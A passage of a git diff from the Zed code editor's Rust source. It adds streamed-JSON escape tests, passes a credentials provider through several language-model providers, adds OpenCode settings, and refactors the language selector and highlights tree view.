super::*; + + #[test] + fn test_fix_streamed_json_strips_incomplete_escape() { + // Trailing `\` inside a string — incomplete escape sequence + let fixed = fix_streamed_json(r#"{"text": "hello\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello"); + } + + #[test] + fn 
test_fix_streamed_json_preserves_complete_escape() { + // `\\` is a complete escape (literal backslash) + let fixed = fix_streamed_json(r#"{"text": "hello\\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello\\"); + } + + #[test] + fn test_fix_streamed_json_strips_escape_after_complete_escape() { + // `\\\` = complete `\\` (literal backslash) + incomplete `\` + let fixed = fix_streamed_json(r#"{"text": "hello\\\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello\\"); + } + + #[test] + fn test_fix_streamed_json_no_escape_at_end() { + let fixed = fix_streamed_json(r#"{"text": "hello"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "hello"); + } + + #[test] + fn test_fix_streamed_json_newline_escape_boundary() { + // Simulates a stream boundary landing between `\` and `n` + let fixed = fix_streamed_json(r#"{"text": "line1\"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "line1"); + + // Next chunk completes the escape + let fixed = fix_streamed_json(r#"{"text": "line1\nline2"#); + let parsed: serde_json::Value = serde_json::from_str(&fixed).expect("valid json"); + assert_eq!(parsed["text"], "line1\nline2"); + } + + #[test] + fn test_fix_streamed_json_incremental_delta_correctness() { + // This is the actual scenario that causes the bug: + // chunk 1 ends mid-escape, chunk 2 completes it. 
+ let chunk1 = r#"{"replacement_text": "fn foo() {\"#; + let fixed1 = fix_streamed_json(chunk1); + let parsed1: serde_json::Value = serde_json::from_str(&fixed1).expect("valid json"); + let text1 = parsed1["replacement_text"].as_str().expect("string"); + assert_eq!(text1, "fn foo() {"); + + let chunk2 = r#"{"replacement_text": "fn foo() {\n return bar;\n}"}"#; + let fixed2 = fix_streamed_json(chunk2); + let parsed2: serde_json::Value = serde_json::from_str(&fixed2).expect("valid json"); + let text2 = parsed2["replacement_text"].as_str().expect("string"); + assert_eq!(text2, "fn foo() {\n return bar;\n}"); + + // The delta should be the newline + rest, with no spurious backslash + let delta = &text2[text1.len()..]; + assert_eq!(delta, "\n return bar;\n}"); + } +} diff --git a/crates/language_models/src/provider/vercel.rs b/crates/language_models/src/provider/vercel.rs index 3b324e46927f5864d83a5e4b74c46f5e39e8ab3a..cedbc9c3cb988375b90864ceb23a3b14fc50abdd 100644 --- a/crates/language_models/src/provider/vercel.rs +++ b/crates/language_models/src/provider/vercel.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::HttpClient; @@ -38,6 +39,7 @@ pub struct VercelLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -46,30 +48,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let 
credentials_provider = self.credentials_provider.clone(); let api_url = VercelLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl VercelLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -248,6 +271,10 @@ impl LanguageModel for VercelLanguageModel { true } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto diff --git a/crates/language_models/src/provider/vercel_ai_gateway.rs b/crates/language_models/src/provider/vercel_ai_gateway.rs index 69c54e624b9e7289abaefbe7ab654d73df385b62..66767edd809531b4b020263654922d742a1a04be 100644 --- a/crates/language_models/src/provider/vercel_ai_gateway.rs +++ b/crates/language_models/src/provider/vercel_ai_gateway.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{AsyncReadExt, FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, SharedString, Task, Window}; use http_client::{AsyncBody, HttpClient, Method, Request as HttpRequest, http}; @@ -41,6 +42,7 @@ pub struct 
VercelAiGatewayLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, http_client: Arc, available_models: Vec, fetch_models_task: Option>>, @@ -52,16 +54,26 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelAiGatewayLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = VercelAiGatewayLanguageModelProvider::api_url(cx); - let task = self - .api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx); + let task = self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ); cx.spawn(async move |this, cx| { let result = task.await; @@ -100,7 +112,11 @@ impl State { } impl VercelAiGatewayLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::({ let mut last_settings = VercelAiGatewayLanguageModelProvider::settings(cx).clone(); @@ -116,6 +132,7 @@ impl VercelAiGatewayLanguageModelProvider { .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, http_client: http_client.clone(), available_models: Vec::new(), fetch_models_task: None, @@ -385,6 +402,10 @@ impl LanguageModel for VercelAiGatewayLanguageModel { } } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_split_token_display(&self) -> bool { true } diff --git a/crates/language_models/src/provider/x_ai.rs 
b/crates/language_models/src/provider/x_ai.rs index 06564224dea9621d594e5cf3f4a84093f1620446..88189864c7b4b650a24afb2b872c1d6105cf9782 100644 --- a/crates/language_models/src/provider/x_ai.rs +++ b/crates/language_models/src/provider/x_ai.rs @@ -1,5 +1,6 @@ use anyhow::Result; use collections::BTreeMap; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, StreamExt, future::BoxFuture}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Task, Window}; use http_client::HttpClient; @@ -39,6 +40,7 @@ pub struct XAiLanguageModelProvider { pub struct State { api_key_state: ApiKeyState, + credentials_provider: Arc, } impl State { @@ -47,30 +49,51 @@ impl State { } fn set_api_key(&mut self, api_key: Option, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = XAiLanguageModelProvider::api_url(cx); - self.api_key_state - .store(api_url, api_key, |this| &mut this.api_key_state, cx) + self.api_key_state.store( + api_url, + api_key, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } fn authenticate(&mut self, cx: &mut Context) -> Task> { + let credentials_provider = self.credentials_provider.clone(); let api_url = XAiLanguageModelProvider::api_url(cx); - self.api_key_state - .load_if_needed(api_url, |this| &mut this.api_key_state, cx) + self.api_key_state.load_if_needed( + api_url, + |this| &mut this.api_key_state, + credentials_provider, + cx, + ) } } impl XAiLanguageModelProvider { - pub fn new(http_client: Arc, cx: &mut App) -> Self { + pub fn new( + http_client: Arc, + credentials_provider: Arc, + cx: &mut App, + ) -> Self { let state = cx.new(|cx| { cx.observe_global::(|this: &mut State, cx| { + let credentials_provider = this.credentials_provider.clone(); let api_url = Self::api_url(cx); - this.api_key_state - .handle_url_change(api_url, |this| &mut this.api_key_state, cx); + this.api_key_state.handle_url_change( + api_url, + |this| &mut this.api_key_state, + 
credentials_provider, + cx, + ); cx.notify(); }) .detach(); State { api_key_state: ApiKeyState::new(Self::api_url(cx), (*API_KEY_ENV_VAR).clone()), + credentials_provider, } }); @@ -257,6 +280,10 @@ impl LanguageModel for XAiLanguageModel { self.model.supports_images() } + fn supports_streaming_tools(&self) -> bool { + true + } + fn supports_tool_choice(&self, choice: LanguageModelToolChoice) -> bool { match choice { LanguageModelToolChoice::Auto @@ -265,8 +292,7 @@ impl LanguageModel for XAiLanguageModel { } } fn tool_input_format(&self) -> LanguageModelToolSchemaFormat { - let model_id = self.model.id().trim().to_lowercase(); - if model_id.eq(x_ai::Model::Grok4.id()) || model_id.eq(x_ai::Model::GrokCodeFast1.id()) { + if self.model.requires_json_schema_subset() { LanguageModelToolSchemaFormat::JsonSchemaSubset } else { LanguageModelToolSchemaFormat::JsonSchema @@ -285,6 +311,10 @@ impl LanguageModel for XAiLanguageModel { self.model.max_output_tokens() } + fn supports_split_token_display(&self) -> bool { + true + } + fn count_tokens( &self, request: LanguageModelRequest, diff --git a/crates/language_models/src/settings.rs b/crates/language_models/src/settings.rs index 7466a337f636abcd8ad70343dfd64a825a7fb6a7..f60d4c6cb498519133098f6306746c5a59e7a1d9 100644 --- a/crates/language_models/src/settings.rs +++ b/crates/language_models/src/settings.rs @@ -8,7 +8,8 @@ use crate::provider::{ deepseek::DeepSeekSettings, google::GoogleSettings, lmstudio::LmStudioSettings, mistral::MistralSettings, ollama::OllamaSettings, open_ai::OpenAiSettings, open_ai_compatible::OpenAiCompatibleSettings, open_router::OpenRouterSettings, - vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, x_ai::XAiSettings, + opencode::OpenCodeSettings, vercel::VercelSettings, vercel_ai_gateway::VercelAiGatewaySettings, + x_ai::XAiSettings, }; #[derive(Debug, RegisterSetting)] @@ -20,6 +21,7 @@ pub struct AllLanguageModelSettings { pub lmstudio: LmStudioSettings, pub mistral: 
MistralSettings, pub ollama: OllamaSettings, + pub opencode: OpenCodeSettings, pub open_router: OpenRouterSettings, pub openai: OpenAiSettings, pub openai_compatible: HashMap, OpenAiCompatibleSettings>, @@ -41,6 +43,7 @@ impl settings::Settings for AllLanguageModelSettings { let lmstudio = language_models.lmstudio.unwrap(); let mistral = language_models.mistral.unwrap(); let ollama = language_models.ollama.unwrap(); + let opencode = language_models.opencode.unwrap(); let open_router = language_models.open_router.unwrap(); let openai = language_models.openai.unwrap(); let openai_compatible = language_models.openai_compatible.unwrap(); @@ -85,6 +88,10 @@ impl settings::Settings for AllLanguageModelSettings { available_models: ollama.available_models.unwrap_or_default(), context_window: ollama.context_window, }, + opencode: OpenCodeSettings { + api_url: opencode.api_url.unwrap(), + available_models: opencode.available_models.unwrap_or_default(), + }, open_router: OpenRouterSettings { api_url: open_router.api_url.unwrap(), available_models: open_router.available_models.unwrap_or_default(), diff --git a/crates/language_onboarding/Cargo.toml b/crates/language_onboarding/Cargo.toml index 38cf8a604a87f403e2d2720be6a2ba69a61e7484..1ab0a75fc3f726de5ec81c18f5b7ae5c136caeea 100644 --- a/crates/language_onboarding/Cargo.toml +++ b/crates/language_onboarding/Cargo.toml @@ -21,9 +21,3 @@ gpui.workspace = true project.workspace = true ui.workspace = true workspace.workspace = true - -# Uncomment other workspace dependencies as needed -# assistant.workspace = true -# client.workspace = true -# project.workspace = true -# settings.workspace = true diff --git a/crates/language_onboarding/src/python.rs b/crates/language_onboarding/src/python.rs index e715cb7c806f417980a93a62210c72ca8529fcb5..64b6502327f71e7a68f40b5a7690f308ecbf8c40 100644 --- a/crates/language_onboarding/src/python.rs +++ b/crates/language_onboarding/src/python.rs @@ -23,7 +23,7 @@ impl BasedPyrightBanner { 
this.have_basedpyright = true; } }); - let dismissed = Self::dismissed(); + let dismissed = Self::dismissed(cx); Self { dismissed, have_basedpyright: false, @@ -56,10 +56,8 @@ impl Render for BasedPyrightBanner { .gap_0p5() .child( Button::new("learn-more", "Learn More") - .icon(IconName::ArrowUpRight) .label_size(LabelSize::Small) - .icon_size(IconSize::XSmall) - .icon_color(Color::Muted) + .end_icon(Icon::new(IconName::ArrowUpRight).size(IconSize::XSmall).color(Color::Muted)) .on_click(|_, _, cx| { cx.open_url("https://zed.dev/docs/languages/python") }), diff --git a/crates/language_selector/src/active_buffer_language.rs b/crates/language_selector/src/active_buffer_language.rs index c75c3954cc6590c2e0cb4326c073ed004eaac280..1f280282af933094cf46cd9e7ab790efd07b8a12 100644 --- a/crates/language_selector/src/active_buffer_language.rs +++ b/crates/language_selector/src/active_buffer_language.rs @@ -29,7 +29,7 @@ impl ActiveBufferLanguage { self.active_language = Some(None); let editor = editor.read(cx); - if let Some((_, buffer, _)) = editor.active_excerpt(cx) + if let Some(buffer) = editor.active_buffer(cx) && let Some(language) = buffer.read(cx).language() { self.active_language = Some(Some(language.name())); diff --git a/crates/language_selector/src/language_selector.rs b/crates/language_selector/src/language_selector.rs index 17a39d4979a1321a4b0e612bff228f186098babf..70a03514f45371d58d0a8ee0a14eb87565d3a514 100644 --- a/crates/language_selector/src/language_selector.rs +++ b/crates/language_selector/src/language_selector.rs @@ -51,11 +51,11 @@ impl LanguageSelector { cx: &mut Context, ) -> Option<()> { let registry = workspace.app_state().languages.clone(); - let (_, buffer, _) = workspace + let buffer = workspace .active_item(cx)? .act_as::(cx)? 
.read(cx) - .active_excerpt(cx)?; + .active_buffer(cx)?; let project = workspace.project().clone(); workspace.toggle_modal(window, cx, move |window, cx| { @@ -280,20 +280,28 @@ impl PickerDelegate for LanguageSelectorDelegate { }; this.update_in(cx, |this, window, cx| { - let delegate = &mut this.delegate; - delegate.matches = matches; - delegate.selected_index = delegate - .selected_index - .min(delegate.matches.len().saturating_sub(1)); - - if query_is_empty { - if let Some(index) = delegate - .current_language_candidate_index - .and_then(|ci| delegate.matches.iter().position(|m| m.candidate_id == ci)) - { - this.set_selected_index(index, None, false, window, cx); - } + if matches.is_empty() { + this.delegate.matches = matches; + this.delegate.selected_index = 0; + cx.notify(); + return; } + + let selected_index = if query_is_empty { + this.delegate + .current_language_candidate_index + .and_then(|current_language_candidate_index| { + matches.iter().position(|mat| { + mat.candidate_id == current_language_candidate_index + }) + }) + .unwrap_or(0) + } else { + 0 + }; + + this.delegate.matches = matches; + this.set_selected_index(selected_index, None, false, window, cx); cx.notify(); }) .log_err(); @@ -345,28 +353,25 @@ mod tests { fn register_test_languages(project: &Entity, cx: &mut VisualTestContext) { project.read_with(cx, |project, _| { let language_registry = project.languages(); - language_registry.add(Arc::new(Language::new( - LanguageConfig { - name: "Rust".into(), - matcher: LanguageMatcher { - path_suffixes: vec!["rs".to_string()], + for (language_name, path_suffix) in [ + ("C", "c"), + ("Go", "go"), + ("Ruby", "rb"), + ("Rust", "rs"), + ("TypeScript", "ts"), + ] { + language_registry.add(Arc::new(Language::new( + LanguageConfig { + name: language_name.into(), + matcher: LanguageMatcher { + path_suffixes: vec![path_suffix.to_string()], + ..Default::default() + }, ..Default::default() }, - ..Default::default() - }, - None, - ))); - 
language_registry.add(Arc::new(Language::new( - LanguageConfig { - name: "TypeScript".into(), - matcher: LanguageMatcher { - path_suffixes: vec!["ts".to_string()], - ..Default::default() - }, - ..Default::default() - }, - None, - ))); + None, + ))); + } }); } @@ -406,6 +411,24 @@ mod tests { workspace: &Entity, project: &Entity, cx: &mut VisualTestContext, + ) -> Entity { + let editor = open_new_buffer_editor(workspace, project, cx).await; + // Ensure the buffer has no language after the editor is created + let buffer = editor.read_with(cx, |editor, cx| { + editor + .active_buffer(cx) + .expect("editor should have an active buffer") + }); + buffer.update(cx, |buffer, cx| { + buffer.set_language(None, cx); + }); + editor + } + + async fn open_new_buffer_editor( + workspace: &Entity, + project: &Entity, + cx: &mut VisualTestContext, ) -> Entity { let create_buffer = project.update(cx, |project, cx| project.create_buffer(None, true, cx)); let buffer = create_buffer.await.expect("empty buffer should be created"); @@ -415,10 +438,6 @@ mod tests { workspace.update_in(cx, |workspace, window, cx| { workspace.add_item_to_center(Box::new(editor.clone()), window, cx); }); - // Ensure the buffer has no language after the editor is created - buffer.update(cx, |buffer, cx| { - buffer.set_language(None, cx); - }); editor } @@ -435,8 +454,8 @@ mod tests { .await .expect("language should exist in registry"); editor.update(cx, move |editor, cx| { - let (_, buffer, _) = editor - .active_excerpt(cx) + let buffer = editor + .active_buffer(cx) .expect("editor should have an active excerpt"); buffer.update(cx, |buffer, cx| { buffer.set_language(Some(language), cx); @@ -560,9 +579,9 @@ mod tests { assert_selected_language_for_editor(&workspace, &rust_editor, Some("Rust"), cx); assert_selected_language_for_editor(&workspace, &typescript_editor, Some("TypeScript"), cx); // Ensure the empty editor's buffer has no language before asserting - let (_, buffer, _) = empty_editor.read_with(cx, 
|editor, cx| { + let buffer = empty_editor.read_with(cx, |editor, cx| { editor - .active_excerpt(cx) + .active_buffer(cx) .expect("editor should have an active excerpt") }); buffer.update(cx, |buffer, cx| { @@ -570,4 +589,84 @@ mod tests { }); assert_selected_language_for_editor(&workspace, &empty_editor, None, cx); } + + #[gpui::test] + async fn test_language_selector_selects_first_match_after_querying_new_buffer( + cx: &mut TestAppContext, + ) { + let app_state = init_test(cx); + app_state + .fs + .as_fake() + .insert_tree(path!("/test"), json!({})) + .await; + + let project = Project::test(app_state.fs.clone(), [path!("/test").as_ref()], cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = + multi_workspace.read_with(cx, |multi_workspace, _| multi_workspace.workspace().clone()); + register_test_languages(&project, cx); + + let editor = open_new_buffer_editor(&workspace, &project, cx).await; + workspace.update_in(cx, |workspace, window, cx| { + let was_activated = workspace.activate_item(&editor, true, true, window, cx); + assert!( + was_activated, + "editor should be activated before opening the modal" + ); + }); + cx.run_until_parked(); + + let picker = open_selector(&workspace, cx); + picker.read_with(cx, |picker, _| { + let selected_match = picker + .delegate + .matches + .get(picker.delegate.selected_index) + .expect("selected index should point to a match"); + let selected_candidate = picker + .delegate + .candidates + .get(selected_match.candidate_id) + .expect("selected match should map to a candidate"); + + assert_eq!(selected_candidate.string, "Plain Text"); + assert!( + picker + .delegate + .current_language_candidate_index + .is_some_and(|current_language_candidate_index| { + current_language_candidate_index > 1 + }), + "test setup should place Plain Text after at least two earlier languages", + ); + }); + + picker.update_in(cx, |picker, window, cx| { + 
picker.update_matches("ru".to_string(), window, cx) + }); + cx.run_until_parked(); + + picker.read_with(cx, |picker, _| { + assert!( + picker.delegate.matches.len() > 1, + "query should return multiple matches" + ); + assert_eq!(picker.delegate.selected_index, 0); + + let first_match = picker + .delegate + .matches + .first() + .expect("query should produce at least one match"); + let selected_match = picker + .delegate + .matches + .get(picker.delegate.selected_index) + .expect("selected index should point to a match"); + + assert_eq!(selected_match.candidate_id, first_match.candidate_id); + }); + } } diff --git a/crates/language_tools/Cargo.toml b/crates/language_tools/Cargo.toml index 1698c7294969d3d3a641f0eb4611153efb658c6d..26e230c1d92f674642eab125f62787a3c29a3665 100644 --- a/crates/language_tools/Cargo.toml +++ b/crates/language_tools/Cargo.toml @@ -44,4 +44,5 @@ release_channel.workspace = true gpui = { workspace = true, features = ["test-support"] } semver.workspace = true util = { workspace = true, features = ["test-support"] } -zlog.workspace = true \ No newline at end of file +zlog.workspace = true +theme_settings.workspace = true \ No newline at end of file diff --git a/crates/language_tools/src/highlights_tree_view.rs b/crates/language_tools/src/highlights_tree_view.rs index 9796c1c07375956184bdd28fbd8f5bb52bff2a32..763cdf76dab46a7fc1c233eda84cfb4ab50e6975 100644 --- a/crates/language_tools/src/highlights_tree_view.rs +++ b/crates/language_tools/src/highlights_tree_view.rs @@ -1,5 +1,5 @@ use editor::{ - Anchor, Editor, ExcerptId, HighlightKey, MultiBufferSnapshot, SelectionEffects, ToPoint, + Anchor, Editor, HighlightKey, MultiBufferSnapshot, SelectionEffects, ToPoint, scroll::Autoscroll, }; use gpui::{ @@ -8,7 +8,7 @@ use gpui::{ MouseDownEvent, MouseMoveEvent, ParentElement, Render, ScrollStrategy, SharedString, Styled, Task, UniformListScrollHandle, WeakEntity, Window, actions, div, rems, uniform_list, }; -use language::ToOffset; +use 
language::{BufferId, Point, ToOffset}; use menu::{SelectNext, SelectPrevious}; use std::{mem, ops::Range}; use theme::ActiveTheme; @@ -113,12 +113,12 @@ impl HighlightCategory { #[derive(Debug, Clone)] struct HighlightEntry { - excerpt_id: ExcerptId, range: Range, + buffer_id: BufferId, + buffer_point_range: Range, range_display: SharedString, style: HighlightStyle, category: HighlightCategory, - sort_key: (ExcerptId, u32, u32, u32, u32), } /// An item in the display list: either a separator between excerpts or a highlight entry. @@ -209,20 +209,32 @@ impl HighlightsTreeView { window: &mut Window, cx: &mut Context, ) { - let Some(editor) = active_item - .filter(|item| item.item_id() != cx.entity_id()) - .and_then(|item| item.downcast::()) - else { - self.clear(cx); - return; + let active_editor = match active_item { + Some(active_item) => { + if active_item.item_id() == cx.entity_id() { + return; + } else { + match active_item.downcast::() { + Some(active_editor) => active_editor, + None => { + self.clear(cx); + return; + } + } + } + } + None => { + self.clear(cx); + return; + } }; let is_different_editor = self .editor .as_ref() - .is_none_or(|state| state.editor != editor); + .is_none_or(|state| state.editor != active_editor); if is_different_editor { - self.set_editor(editor, window, cx); + self.set_editor(active_editor, window, cx); } } @@ -306,20 +318,18 @@ impl HighlightsTreeView { display_map.update(cx, |display_map, cx| { for (key, text_highlights) in display_map.all_text_highlights() { for range in &text_highlights.1 { - let excerpt_id = range.start.excerpt_id; - let (range_display, sort_key) = format_anchor_range( - range, - excerpt_id, - &multi_buffer_snapshot, - is_singleton, - ); + let Some((range_display, buffer_id, buffer_point_range)) = + format_anchor_range(range, &multi_buffer_snapshot) + else { + continue; + }; entries.push(HighlightEntry { - excerpt_id, range: range.clone(), + buffer_id, range_display, style: text_highlights.0, category: 
HighlightCategory::Text(*key), - sort_key, + buffer_point_range, }); } } @@ -332,13 +342,11 @@ impl HighlightsTreeView { .and_then(|buf| buf.read(cx).language().map(|l| l.name())); for token in tokens.iter() { let range = token.range.start..token.range.end; - let excerpt_id = range.start.excerpt_id; - let (range_display, sort_key) = format_anchor_range( - &range, - excerpt_id, - &multi_buffer_snapshot, - is_singleton, - ); + let Some((range_display, entry_buffer_id, buffer_point_range)) = + format_anchor_range(&range, &multi_buffer_snapshot) + else { + continue; + }; let Some(stylizer) = lsp_store.get_or_create_token_stylizer( token.server_id, language_name.as_ref(), @@ -363,7 +371,9 @@ impl HighlightsTreeView { rule.style .iter() .find(|style_name| { - semantic_theme.get_opt(style_name).is_some() + semantic_theme + .style_for_name(style_name) + .is_some() }) .map(|style_name| { SharedString::from(style_name.clone()) @@ -373,8 +383,8 @@ impl HighlightsTreeView { }); entries.push(HighlightEntry { - excerpt_id, range, + buffer_id: entry_buffer_id, range_display, style: interner[token.style], category: HighlightCategory::SemanticToken { @@ -384,7 +394,7 @@ impl HighlightsTreeView { .map(SharedString::from), theme_key, }, - sort_key, + buffer_point_range, }); } } @@ -392,27 +402,34 @@ impl HighlightsTreeView { }); let syntax_theme = cx.theme().syntax().clone(); - for (excerpt_id, buffer_snapshot, excerpt_range) in multi_buffer_snapshot.excerpts() { + for excerpt_range in multi_buffer_snapshot.excerpts() { + let Some(buffer_snapshot) = + multi_buffer_snapshot.buffer_for_id(excerpt_range.context.start.buffer_id) + else { + continue; + }; + let start_offset = excerpt_range.context.start.to_offset(buffer_snapshot); let end_offset = excerpt_range.context.end.to_offset(buffer_snapshot); let range = start_offset..end_offset; - let captures = buffer_snapshot - .syntax - .captures(range, buffer_snapshot, |grammar| { - grammar.highlights_config.as_ref().map(|c| &c.query) - }); + 
let captures = buffer_snapshot.captures(range, |grammar| { + grammar.highlights_config.as_ref().map(|c| &c.query) + }); let grammars: Vec<_> = captures.grammars().to_vec(); let highlight_maps: Vec<_> = grammars.iter().map(|g| g.highlight_map()).collect(); for capture in captures { - let highlight_id = highlight_maps[capture.grammar_index].get(capture.index); - let Some(style) = highlight_id.style(&syntax_theme) else { + let Some(highlight_id) = highlight_maps[capture.grammar_index].get(capture.index) + else { + continue; + }; + let Some(style) = syntax_theme.get(highlight_id).cloned() else { continue; }; - let theme_key = highlight_id - .name(&syntax_theme) + let theme_key = syntax_theme + .get_capture_name(highlight_id) .map(|theme_key| SharedString::from(theme_key.to_string())); let capture_name = grammars[capture.grammar_index] @@ -425,8 +442,8 @@ impl HighlightsTreeView { let start_anchor = buffer_snapshot.anchor_before(capture.node.start_byte()); let end_anchor = buffer_snapshot.anchor_after(capture.node.end_byte()); - let start = multi_buffer_snapshot.anchor_in_excerpt(excerpt_id, start_anchor); - let end = multi_buffer_snapshot.anchor_in_excerpt(excerpt_id, end_anchor); + let start = multi_buffer_snapshot.anchor_in_excerpt(start_anchor); + let end = multi_buffer_snapshot.anchor_in_excerpt(end_anchor); let (start, end) = match (start, end) { (Some(s), Some(e)) => (s, e), @@ -434,29 +451,38 @@ impl HighlightsTreeView { }; let range = start..end; - let (range_display, sort_key) = - format_anchor_range(&range, excerpt_id, &multi_buffer_snapshot, is_singleton); + let Some((range_display, buffer_id, buffer_point_range)) = + format_anchor_range(&range, &multi_buffer_snapshot) + else { + continue; + }; entries.push(HighlightEntry { - excerpt_id, range, + buffer_id, range_display, style, category: HighlightCategory::SyntaxToken { capture_name, theme_key, }, - sort_key, + buffer_point_range, }); } } entries.sort_by(|a, b| { - a.sort_key - .cmp(&b.sort_key) + 
a.buffer_id + .cmp(&b.buffer_id) + .then_with(|| a.buffer_point_range.start.cmp(&b.buffer_point_range.start)) + .then_with(|| a.buffer_point_range.end.cmp(&b.buffer_point_range.end)) .then_with(|| a.category.cmp(&b.category)) }); - entries.dedup_by(|a, b| a.sort_key == b.sort_key && a.category == b.category); + entries.dedup_by(|a, b| { + a.buffer_id == b.buffer_id + && a.buffer_point_range == b.buffer_point_range + && a.category == b.category + }); self.cached_entries = entries; self.rebuild_display_items(&multi_buffer_snapshot, cx); @@ -472,7 +498,7 @@ impl HighlightsTreeView { fn rebuild_display_items(&mut self, snapshot: &MultiBufferSnapshot, cx: &App) { self.display_items.clear(); - let mut last_excerpt_id: Option = None; + let mut last_range_end: Option = None; for (entry_ix, entry) in self.cached_entries.iter().enumerate() { if !self.should_show_entry(entry) { @@ -480,11 +506,14 @@ impl HighlightsTreeView { } if !self.is_singleton { - let excerpt_changed = - last_excerpt_id.is_none_or(|last_id| last_id != entry.excerpt_id); + let excerpt_changed = last_range_end.is_none_or(|anchor| { + snapshot + .excerpt_containing(anchor..entry.range.start) + .is_none() + }); if excerpt_changed { - last_excerpt_id = Some(entry.excerpt_id); - let label = excerpt_label_for(entry.excerpt_id, snapshot, cx); + last_range_end = Some(entry.range.end); + let label = excerpt_label_for(entry, snapshot, cx); self.display_items .push(DisplayItem::ExcerptSeparator { label }); } @@ -503,10 +532,6 @@ impl HighlightsTreeView { } fn scroll_to_cursor_position(&mut self, cursor: &Anchor, snapshot: &MultiBufferSnapshot) { - let cursor_point = cursor.to_point(snapshot); - let cursor_key = (cursor_point.row, cursor_point.column); - let cursor_excerpt = cursor.excerpt_id; - let best = self .display_items .iter() @@ -519,17 +544,18 @@ impl HighlightsTreeView { _ => None, }) .filter(|(_, _, entry)| { - let (excerpt_id, start_row, start_col, end_row, end_col) = entry.sort_key; - if 
!self.is_singleton && excerpt_id != cursor_excerpt { - return false; - } - let start = (start_row, start_col); - let end = (end_row, end_col); - cursor_key >= start && cursor_key <= end + entry.range.start.cmp(&cursor, snapshot).is_le() + && cursor.cmp(&entry.range.end, snapshot).is_lt() }) .min_by_key(|(_, _, entry)| { - let (_, start_row, start_col, end_row, end_col) = entry.sort_key; - (end_row - start_row, end_col.saturating_sub(start_col)) + ( + entry.buffer_point_range.end.row - entry.buffer_point_range.start.row, + entry + .buffer_point_range + .end + .column + .saturating_sub(entry.buffer_point_range.start.column), + ) }) .map(|(display_ix, entry_ix, _)| (display_ix, entry_ix)); @@ -1063,12 +1089,13 @@ impl ToolbarItemView for HighlightsTreeToolbarItemView { } fn excerpt_label_for( - excerpt_id: ExcerptId, + entry: &HighlightEntry, snapshot: &MultiBufferSnapshot, cx: &App, ) -> SharedString { - let buffer = snapshot.buffer_for_excerpt(excerpt_id); - let path_label = buffer + let path_label = snapshot + .anchor_to_buffer_anchor(entry.range.start) + .and_then(|(anchor, _)| snapshot.buffer_for_id(anchor.buffer_id)) .and_then(|buf| buf.file()) .map(|file| { let full_path = file.full_path(cx); @@ -1080,50 +1107,21 @@ fn excerpt_label_for( fn format_anchor_range( range: &Range, - excerpt_id: ExcerptId, snapshot: &MultiBufferSnapshot, - is_singleton: bool, -) -> (SharedString, (ExcerptId, 